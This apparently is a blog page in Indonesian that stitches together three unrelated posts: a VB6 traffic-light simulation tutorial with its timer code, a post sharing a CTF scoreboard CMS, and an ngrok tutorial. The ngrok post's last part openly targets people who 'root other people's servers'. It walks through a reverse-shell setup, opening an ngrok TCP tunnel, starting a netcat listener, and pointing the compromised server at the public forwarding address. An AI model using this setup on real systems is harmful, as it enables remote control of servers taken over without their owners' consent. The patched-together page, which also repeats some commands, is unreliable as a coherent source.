Pada pertemuan kali ini tip dan trik visual ingin memberikan trik bagaimana membuat simulasi lampu lalulintas jalan raya dengan menggunakan Visual Basic 6.0,.Agar lebih mudah kita memahaminya perhatikan langkah-langkah berikut ini:
Cara Membuat Simulasi Lampu Merah Lalulintas dengan VB6
1. Buka Form Visual Basic Anda
2. Tambahkan 4 Timer, 2 Frame (untuk Wadah Lampu), 8 Shape (6 Shape Lingkaran dan 2 Shape kotak bujur sangkar untuk kaki) dan beberapa Label.
Untuk lebih jelasnya lihat gambar dibwah ini dan desainlah form Anda ( ikuti Petunjuk pada gambar dibawah ini )
LuqmanseoFriendly - Cara Membuat Simulasi Lampu Merah Lalulintas dengan VB6 |
Setelah Anda selesai mendesain Form sekarang kita akan membuat codenya :
3. Buka jendela kode dengan F7, lalu hapus semua kode yang ada di jendela code sampai kosong
4. Setelah itu silakan Ketik atau Copy kode dibawah ini di jendela Kode:
Private Sub Form_Load()
Timer1.Enabled = True
Timer2.Enabled = False
Timer3.Enabled = False
Timer4.Enabled = False
Timer1.Interval = 8000
Timer2.Interval = 3000
Timer3.Interval = 8000
Timer4.Interval = 8000
Shape1.FillColor = &HFF&
Shape2.FillColor = &HC0FFFF
Shape3.FillColor = &HC0FFC0
Shape5.FillColor = &HC0C0FF
Shape6.FillColor = &HC0FFFF
Shape7.FillColor = &HFF00&
End Sub
Private Sub Timer1_Timer()
Shape3.FillColor = &HC0FFC0
Shape1.FillColor = &HFF&
Shape2.FillColor = &HC0FFFF
Shape5.FillColor = &HC0C0FF
Shape6.FillColor = &HC0FFFF
Shape7.FillColor = &HFF00&
Timer2.Enabled = True
Timer1.Enabled = False
Label1.Caption = "STOP"
Label2.Caption = "RUN"
End Sub
Private Sub Timer2_Timer()
Shape2.FillColor = &HFFFF&
Shape1.FillColor = &HC0C0FF
Shape7.FillColor = &HC0FFC0
Shape6.FillColor = &HFFFF&
Timer3.Enabled = True
Timer2.Enabled = False
Label1.Caption = "SIAP-SIAP"
Label2.Caption = "SIAP-SIAP"
End Sub
Private Sub Timer3_Timer()
Shape2.FillColor = &HC0FFFF
Shape3.FillColor = &HFF00&
Shape6.FillColor = &HC0FFFF
Shape5.FillColor = &HFF&
Timer4.Enabled = True
Timer3.Enabled = False
Label1.Caption = "RUN"
Label2.Caption = "STOP"
End Sub
Private Sub Timer4_Timer()
Shape2.FillColor = &HFFFF&
Shape1.FillColor = &HC0C0FF
Shape3.FillColor = &HC0FFC0
Shape5.FillColor = &HC0C0FF
Shape7.FillColor = &HC0FFC0
Shape6.FillColor = &HFFFF&
Timer1.Enabled = True
Timer4.Enabled = False
Label1.Caption = "SIAP-SIAP"
Label2.Caption = "SIAP-SIAP"
End Sub
5. Simpan Code Anda dan jalankan Program.
Setelah Anda menjalankan program maka lampu merah akan langsung aktif persis seperti lampu merah yang berada di jalanan yang sering kita lihat.Aplikasi ini bisa Anda terapkan untuk jenis permaianan Game.Silahkan kembangkan kreatifitas Anda.
Yoo... kali ini saya mau membagikan kode sumber Scoreboard CTF yang dibuat oleh salahsatu admin IndoXploit yaitu Eka Syahwan. Jadi buat kalian yang ingin menyelenggarakan CTF bisa menggunakan cms ini.
Halaman Depan |
Nah, diatas adalah tampilan dari halaman depan. Menampilkan daftar top 10 pemain dan juga tim peserta CTF.
Halaman Login |
Halaman login untuk member dan admin memiliki tampilan yang sama. Kalian harus memasukkan username dan juga password.
Halaman Admin |
Di halaman admins eidiri kalian dapat menambah dan mengedit soal, manajemen peserta CTF dan juga update informasi mengenai CTF yang diselenggarakan.
Menu Tambah Soal |
Untuk menu dan fitur lainnya kalian bisa eksplore sendiri. Sekarang bagian member.
Halaman Member |
Di halaman member atau peserta CTF sendiri terdapat menu submit flag, peraturan ctf, hadiah , dan menu contact admin/penyelenggara CTF.
Jika kalian tertarik, kalian bisa mendownload source code nya disini :
Sementara untuk htaccess nya bisa kalian download disini :
Yang perlu diperhatikan, ini merupakan versi terdahulu atau versi lama dimana php yang digunakan masih versi 5. Sehingga jika kalian menggunakannya di server dengan PHP7 harus ada beberapa perubahan di script nya.
Sekian postingan kali ini, semoga bermanfaat.
Source : LinuxSec
LuqmanSeoFriendly - Oke kali ini mau berbagi sedikit tips buat kalian yang tidak memiliki ip publik dari provider internet yang kalian pakai, kalian bisa menggunakan ngrok sebagai alternatif. Cara penggunaannya pun sangat mudah.
Oke langsung saja ke tutorialnya ya.
Pertama kita download dulu dari web nya. Kenapa gak pake apt-get (buat debian dan turunannya) aja ? Karena di web ngrok kita bisa mendapatkan versi terbaru, sementara yang ada di repository debian dan ubuntu masih versi lawas.
Pilih yang sesuai dengan arsitektur OS kalian, 64bit atau 32bit.
Lalu setela didownload masukkan perintah berikut :
unzip ngrok-stable-linux-*
chmod +x ngrok
sudo cp ngrok /usr/bin
chmod +x ngrok
sudo cp ngrok /usr/bin
Cara pemakaiannya gimana?
Bisa kamu cek di perintah help.
ngrok help
Misalnya kita ingin agar localhost kita (server http port 80) dapat dilihat publik. maka masukkan perintah :
ngrok http 80
Kalian akan mendapatkan alamat forwarding dari ngrok yang bisa diakses publik.
Coba buka di browser :
Nah, selanjutnya kita coba gimana kalo backconnect. Biasanya yang suka ngeroot server orang butuh nih.
Register dulu disini :
Kamu akan mendapatkan auth token di dashboard. Install authtoken tersebut dengan perintah
ngrok authtoken xxxxxxxxx
Oke semua sudah disiapkan. Lanjut ke langkah buat back connect.
Kita pakai port 6969 . (ini bebas, boleh pake port mana saja yang gak kepakai).
ngrok tcp 6969
Setelah statusnya sudah online, kita buka tab terminal lain lalu masukkan perintah
nc -lvp 6969
Bagaimana dengan sisi server yang ingin di remote ?
Kamu lihat bagian forwarding ngrok nya . SS diatas menunjukkan
tcp://0.tcp.ngrok.io:17017
Masukkan host nya 0.tcp.ngrok.io dan port 17017 (bukan 6969) .
Its work!
Oke sekian tutorial kali ini, semoga berguna. Jika ada salah silahkan koreksi dengan cara berkomentar.
Source : Linuxsec
http://www.linuxsec.org |